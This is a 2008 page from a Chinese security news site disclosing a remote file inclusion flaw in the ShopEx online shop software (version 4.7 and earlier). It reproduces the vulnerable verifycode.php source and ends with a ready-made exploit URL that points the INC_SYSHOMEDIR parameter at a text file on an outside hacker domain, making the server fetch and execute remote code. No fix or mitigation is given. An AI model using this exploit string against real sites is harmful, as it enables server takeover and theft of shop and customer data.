| 网站首页 | 新闻中心 | 系统安全 | 网络安全 | 安全技术 | 下载中心 | 安全365社区 |
安全365
收藏本站
设为首页
会员登录:
站内搜索: 新闻中心 系统安全 网络安全 安全技术 下载中心
| 网络安全首页 | 信道安全 | 设备安全 | 协议安全 | Web安全 |
ShopEx PHP远程漏洞
ShopEx PHP远程包含漏洞
作者:寂寞hack… 文章来源:http://hi.baidu.com/isbx/ 点击数: 更新时间:2008-3-19 15:05:54

  影响版本:4.7及以下

  verifycode.php

  /**

  *

  * 登陆验证码生成文件

  *

  * @package ShopEx网上商店系统

  * @version 4.6

  * @author ShopEx.cn

  * @url http://www.shopex.cn/

  * @since PHP 4.3

  * @copyright ShopEx.cn

  *

  **/

  if (!defined("ISSHOP"))

  {

  Header("Location:../index.php");

  exit;

  }

  /* 调用 session 文件 */

  include_once($INC_SYSHOMEDIR."include/session.inc.php");

  mt_srand((double)microtime() * 1000000);

  /* 生成验证码 */

  $strValidate = mt_rand(1000, 9999);

  session_unregister("RANDOM_CODE");

  session_register("RANDOM_CODE");

  $_SESSION["RANDOM_CODE"] = $strValidate."";

  $verifyImg = newclass("verifyCode", $strValidate);

  /* 输出验证码图片 */

  $verifyImg->Output();

  ?>

  Exp: shop/verifycode.php?INC_SYSHOMEDIR=http://www.ynhacker.com/conn.txt?
文章录入:小张    责任编辑:小张 
  • 上一篇文章:

  • 下一篇文章: 没有了
    		•
    【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
     
     
     
    php访问access的方法
    PHP注射基础 经验 技巧三
    php 发送带附件的邮件
    轻轻松松做成PHP计数器
    利用PHP和AJAX创建RSS聚
    PHP 安全配置
    手工注射Php网站脚本学习
    Php博客系统C-blog2.6最
    PHP通用防注入代码
    站长邮箱:webmaster@anquan365.com
    联系电话:86-10-67634029 点击这里给我发消息

    Copyright © 2006-2008 www.anquan365.com 北京华安普特网络科技有限公司 版权所有